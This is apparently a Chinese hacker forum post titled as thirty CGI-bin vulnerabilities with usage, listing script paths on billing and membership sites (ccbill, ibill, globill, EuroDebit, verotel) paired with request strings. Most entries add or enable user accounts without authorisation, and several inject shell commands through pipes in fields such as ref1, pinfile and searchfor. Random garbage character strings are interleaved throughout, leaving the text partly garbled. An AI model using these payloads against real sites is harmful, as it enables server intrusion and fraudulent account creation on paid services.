Cgi-bin 30个漏洞＋使用方法

admin

==============================

$ ?# O3 H# J* a! y/smspass.pl
# S! R( N. W8 v" o" M7 _+ pusername=username&password=password

7 O( ]9 i) r  i9 o) \/index.cgi
* |  f' n' y$ b' u! X5 rwei=ren&gen=command

/passmaster.cgi
Action=Add&Username=Username&Password=Password
" K. X" H) y( V7 F2 p- `. G7 P
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
& A1 V% e$ u8 t6 G  L
& ~2 W7 H4 J* X* z/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

* }. j' Z# A5 k$ y5 m6 j0 m/addusr.pl
( v1 {" Q1 z/ J: K; l- n+ H; p/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

/ccbill-local.asp
8 p; V$ @2 ~9 z2 L; epost_values=username:password

# t* {3 W& b/ Q1 K) ]& L2 o/count.cgi
9 ?/ q! u$ q; t+ d" jpinfile=|echo;ls -la;exit|

/recon.cgi
! i- ]+ D9 @) z' [- \) Y" U/recon.cgi?search
/ O' _7 U/ F  ^, b) n& S7 ksearchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
9 V% S% P* u  C8 u% M" L( ?9 hvercode=username:password:dseegsow:add:amount<&30>

8 T1 S3 D" {1 U/af.cgi
" J$ h. s* n  w. D/ W) |_browser_out=|echo;ls -la;exit;|
- w" Q$ K5 z. b7 g8 M$ P1 y
/modify.cgi
username=username&password=password&expire=30

/openjournal.cgi
% x! y1 E; k' C" D6 }edit=1&ct=2&go=|echo;ls -al;exit|

- f- [  a' ?% z/ ]/ R/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/probecontrol.cgi
command=enable&username=username&password=password
; R. H8 M$ {! x. Z1 b( B1 d, V
* Q( z! x8 M  I0 y, j; s1 }/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
/ o; b4 c6 b0 s" Y& G3 K% l( h
3 r5 s. y0 X3 G. a4 m/htadd.pl
0 D7 Z3 U, f# Y7 n) r: e/ Lconfigfile=|echo; ls -alt; exit
. k. {0 b3 o+ N" w6 d
, F/ o! l1 g" s! v$ G/gx9passwd.cgi
cmd=ADD&user=username&pass=password

  f% D8 Z$ k% ^0 N. W+ D9 U/ibill*.pl
6 Y) S1 V# X* ?8 M- ireqtype=add&authpwd=authpwd&username=username&password=password

8 T: K  A) U, R/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

/globill_ut.cgi
6 `# Q4 R. _; Y; j- Jdo=add&username=username&password=password&wpassword=password
  j. W; l/ M$ Z' q
& K" {5 w! c8 Y% O/usercontrol.cgi
- Z3 i# r2 e1 G  ?/ P1 ecommand=enable&username=USER&password=PASS
* k# e  T) \! `2 ]; d3 B
4 u7 j% V3 B* {# U! F0 @/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password
( [# @% K( c5 v
3 C0 I' ~% ~' D/addusr.pl
user=USER&pass=PASS&confirm=PASS

/pincount.cgi
( A! J# V- M* @+ M/cgi-bin/mastergate/pincount.cgi
; t, w" e5 K3 {/ dpinfile=|echo;pwd;exit|

* |1 h$ z& K! k/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
; ~8 c$ V8 k. |, y  f" N/env.cgi
: h) d. `/ L0 ~3 e/ nADD+;echo;pwd;exit
$ A5 V- d3 ^9 [4 O
5 X( Z9 x& E% H5 w! C" t* b/count.cgi
! M. f- b" Z3 |pinfile=|echo;pwd;exit|
. C, K1 d6 {1 |
/recon.cgi
4 L/ k  R  b# s1 n3 L, z9 a: w8 Psearchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
username=username&password=password&expire=30

7 t" D) w% m' p; w' P9 I==============================